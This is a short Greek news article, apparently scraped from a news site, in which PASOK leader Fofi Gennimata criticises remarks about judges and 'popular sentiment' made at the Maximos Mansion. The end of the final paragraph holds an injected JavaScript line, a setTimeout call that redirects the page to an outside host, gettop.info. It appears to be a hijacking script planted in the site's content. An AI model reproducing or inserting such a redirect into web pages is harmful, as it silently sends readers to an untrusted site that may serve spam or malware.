Γεννηματά: Οι δικαστές δικάζουν με βάση το νόμο και το Σύνταγμα

0
4

 

Σχολιάζοντας τις χθεσινές δηλώσεις του προέδρου του ΣτΕ μέσα στο Μέγαρο Μαξίμου η πρόεδρος του ΠΑΣΟΚ σχολίασε πως «οι δικαστές δικάζουν με βάση τον νόμο και το Σύνταγμα», προσθέτοντας ότι με έκπληξη άκουσε «μέσα στο Μαξίμου να διατυπώνεται η άποψη ότι οι δικαστές δικάζουν με βάση το λαϊκό αίσθημα».

«Εάν υπάρχουν αυτές οι αντιλήψεις και διατυπώνονται μέσα στο Μέγαρο Μαξίμου, ερωτώ ευθέως τον πρωθυπουργό αυτή τη στιγμή και τον προκαλώ να απαντήσει, εάν υιοθετεί αυτές τις απόψεις. Διότι αυτές οι απόψεις είναι πέρα για πέρα αντίθετες με τη λειτουργία της Δημοκρατίας. Σε αυτή την περίπτωση φαντάζεστε τι σημαίνει αυτό; Σημαίνει ότι κάθε φορά που αλλάζει η κυβέρνηση, οι δικαστές πρέπει να παίρνουν αποφάσεις με βάση τη βούληση και τις επιθυμίες της κυβέρνησης», είπε η κ. Γεννηματά.

Όπως συμπλήρωσε, η πολυφωνία συνδέεται άρρηκτα με τα ζητήματα της Δημοκρατίας και η προσπάθεια ελέγχου της ενημέρωσης θίγει, πλήττει, την καρδιά της Δημοκρατίας. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here